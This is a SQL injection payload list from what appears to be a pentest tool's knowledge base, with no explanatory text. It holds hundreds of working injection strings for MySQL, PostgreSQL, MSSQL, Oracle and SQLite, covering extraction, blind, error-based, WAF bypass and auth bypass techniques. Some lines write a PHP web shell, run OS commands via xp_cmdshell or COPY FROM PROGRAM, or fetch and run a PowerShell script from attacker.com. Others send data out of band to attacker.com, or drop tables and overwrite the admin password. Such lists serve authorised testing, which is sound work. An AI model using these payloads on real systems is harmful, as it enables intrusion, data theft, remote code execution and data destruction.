# SQL Injection Payloads - WardenStrike Knowledge Base

# ─── Detection / Fuzzing ──────────────────────────────────────────────────────
'
"
`
')
")
`)
'))
"))
`))
'-'
'&'
'^'
'*'
' OR '1'='1
' OR 1=1--
' OR 1=1#
' OR 1=1/*
" OR "1"="1
" OR 1=1--
') OR ('1'='1
') OR 1=1--
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' ORDER BY 10--
1 UNION SELECT NULL--
1 UNION SELECT NULL,NULL--
1 UNION SELECT NULL,NULL,NULL--

# ─── MySQL ────────────────────────────────────────────────────────────────────
' UNION SELECT 1,2,3--
' UNION SELECT 1,2,3,4--
' UNION SELECT NULL,table_name,NULL FROM information_schema.tables--
' UNION SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT NULL,group_concat(table_name),NULL FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT NULL,group_concat(column_name),NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT NULL,group_concat(username,0x3a,password),NULL FROM users--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND BENCHMARK(5000000,MD5('test'))--
1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--
1' AND UPDATEXML(1,CONCAT(0x7e,(SELECT user())),1)--
1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT database())))--
1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database())))--
' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY '<?php system($_GET[0]); ?>'--
' UNION SELECT '<?php system($_GET[0]); ?>',NULL,NULL INTO OUTFILE '/var/www/html/shell.php'--

# ─── PostgreSQL ───────────────────────────────────────────────────────────────
' UNION SELECT NULL,version(),NULL--
'; SELECT pg_sleep(5)--
' AND 1=CAST((SELECT version()) AS int)--
'; COPY (SELECT '') TO PROGRAM 'id'--
'; CREATE TABLE cmd_exec(cmd_output text)--
'; COPY cmd_exec FROM PROGRAM 'id'--
'; SELECT * FROM cmd_exec--
' UNION SELECT NULL,current_user,NULL--
' UNION SELECT NULL,string_agg(table_name,','),NULL FROM information_schema.tables WHERE table_schema='public'--
' AND 1=(SELECT 1 FROM pg_sleep(5))--
'; SELECT chr(65)||chr(83)||chr(67)||chr(73)||chr(73)--

# ─── MSSQL ────────────────────────────────────────────────────────────────────
' UNION SELECT NULL,@@version,NULL--
'; WAITFOR DELAY '0:0:5'--
'; EXEC xp_cmdshell('whoami')--
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE--
'; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE--
'; EXEC xp_cmdshell('powershell -c "IEX(IWR http://attacker.com/s.ps1)"')--
' AND 1=CONVERT(int,(SELECT @@version))--
' UNION SELECT NULL,name,NULL FROM master..sysdatabases--
' UNION SELECT NULL,table_name,NULL FROM information_schema.tables--
'; DECLARE @q varchar(200); SET @q='SELECT @@version'; EXEC(@q)--
' AND 1=(SELECT COUNT(*) FROM sysusers WHERE name='dbo')--
'; INSERT INTO OPENROWSET('SQLOLEDB','server=attacker.com;uid=sa;pwd=test','SELECT 1,2,3')--

# ─── Oracle ───────────────────────────────────────────────────────────────────
' UNION SELECT NULL,banner,NULL FROM v$version--
' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT version FROM v$instance))--
' UNION SELECT NULL,username,NULL FROM all_users--
' UNION SELECT NULL,table_name,NULL FROM all_tables--
' UNION SELECT NULL,column_name,NULL FROM all_tab_columns WHERE table_name='USERS'--
' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
' UNION SELECT NULL,SYS.DATABASE_NAME,NULL FROM DUAL--
'; EXEC SYS.DBMS_LDAP.INIT('attacker.com',389)--

# ─── SQLite ───────────────────────────────────────────────────────────────────
' UNION SELECT NULL,sqlite_version(),NULL--
' UNION SELECT NULL,group_concat(name),NULL FROM sqlite_master WHERE type='table'--
' UNION SELECT NULL,group_concat(sql),NULL FROM sqlite_master--
' AND (SELECT RANDOMBLOB(100000000))--

# ─── Time-Based Blind ────────────────────────────────────────────────────────
' AND SLEEP(5)--
' AND (SELECT SLEEP(5))--
'; WAITFOR DELAY '0:0:5'--
' AND pg_sleep(5)--
1' AND IF(1=1,SLEEP(5),0)--
1' AND IF(1=2,SLEEP(5),0)--
1' AND IF((SELECT SUBSTRING(database(),1,1))='a',SLEEP(5),0)--
1' AND IF((SELECT COUNT(*) FROM users)>0,SLEEP(5),0)--
' OR SLEEP(5)--
' OR 1=1 AND SLEEP(5)--

# ─── Boolean-Based Blind ─────────────────────────────────────────────────────
' AND 1=1--
' AND 1=2--
' AND SUBSTRING(@@version,1,1)='5'--
' AND SUBSTRING(@@version,1,1)='8'--
' AND ASCII(SUBSTRING(database(),1,1))>64--
' AND ASCII(SUBSTRING(database(),1,1))>96--
' AND (SELECT COUNT(*) FROM users)>0--
' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--

# ─── Error-Based ─────────────────────────────────────────────────────────────
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version())),1)--
' AND ROW(1,1)>(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT user())))--
1 AND GTID_SUBSET(CONCAT(0x7e,(SELECT version())),1)--
' OR 1 GROUP BY CONCAT(user(),0x7e,FLOOR(RAND(0)*2)) HAVING MIN(0)--

# ─── Out-of-Band (OOB) ───────────────────────────────────────────────────────
' UNION SELECT NULL,LOAD_FILE(CONCAT('\\\\',version(),'.attacker.com\\a')),NULL--
'; EXEC master..xp_dirtree '\\attacker.com\a'--
'; EXEC master..xp_fileexist '\\attacker.com\a'--
' AND 1=UTL_HTTP.REQUEST('http://attacker.com/?q='||(SELECT version FROM v$instance))--
' UNION SELECT NULL,sys.fn_sqlvarbasetostr(HashBytes('MD5','test')),NULL--

# ─── Second-Order / Stacked ───────────────────────────────────────────────────
admin'--
admin' #
'; DROP TABLE users--
'; INSERT INTO users VALUES('hacker','hacker@test.com','password')--
'; UPDATE users SET password='hacked' WHERE username='admin'--

# ─── WAF Bypass ───────────────────────────────────────────────────────────────
' /*!UNION*/ /*!SELECT*/ NULL,version(),NULL--
'UNION%23comment%0ASELECT NULL,version(),NULL--
' UNION%0ASELECT%0ANULL,version(),NULL--
' UNION%09SELECT%09NULL,version(),NULL--
'/**/UNION/**/SELECT/**/NULL,version(),NULL--
' uNiOn SeLeCt NULL,version(),NULL--
' UNION SELECT NULL,version()-- -
%27+UNION+SELECT+NULL,version(),NULL--
%27%20UNION%20SELECT%20NULL,version%28%29,NULL--
'||UTL_HTTP.REQUEST('http://attacker.com/'||version)--
' AND (SELECT * FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT database()),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

# ─── NoSQL via SQL context ────────────────────────────────────────────────────
' OR '1'='1' /*
1; db.users.find()
{"$gt":""}
{"$where":"sleep(5000)"}

# ─── Auth Bypass ─────────────────────────────────────────────────────────────
' OR '1'='1'--
' OR 1=1--
admin'--
admin' #
admin'/*
' or 1=1 limit 1 -- -+
'or 1#
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
admin') or ('1'='1'--
") or "1"="1"--
1' or '1'='1
' OR 2>1--
